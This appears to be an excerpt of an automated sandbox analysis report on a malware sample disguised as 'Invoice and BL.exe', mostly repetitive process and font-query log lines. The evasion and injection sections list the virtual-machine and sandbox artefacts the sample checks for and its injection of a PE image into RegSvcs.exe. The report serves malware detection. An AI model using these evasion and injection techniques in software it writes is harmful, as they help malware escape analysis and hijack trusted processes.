            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: Process Memory Space: Invoice and BL.exe PID: 1152, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: C:\Users\user\Desktop\Invoice and BL.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Invoice and BL.exe TID: 908Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
            Source: C:\Users\user\Desktop\Invoice and BL.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 60000
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmpBinary or memory string: VMWARE
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: Invoice and BL.exe, 00000000.00000002.289295785.00000000028E6000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
            Source: RegSvcs.exe, 00000007.00000002.294755116.0000000000F48000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0041289A LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040317B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00402B7C GetProcessHeap,RtlAllocateHeap,
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\Invoice and BL.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\Invoice and BL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\Invoice and BL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Users\user\Desktop\Invoice and BL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
            Source: C:\Users\user\Desktop\Invoice and BL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 415000
            Source: C:\Users\user\Desktop\Invoice and BL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41A000
            Source: C:\Users\user\Desktop\Invoice and BL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 4A0000
            Source: C:\Users\user\Desktop\Invoice and BL.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: BA2008
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Users\user\Desktop\Invoice and BL.exe VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
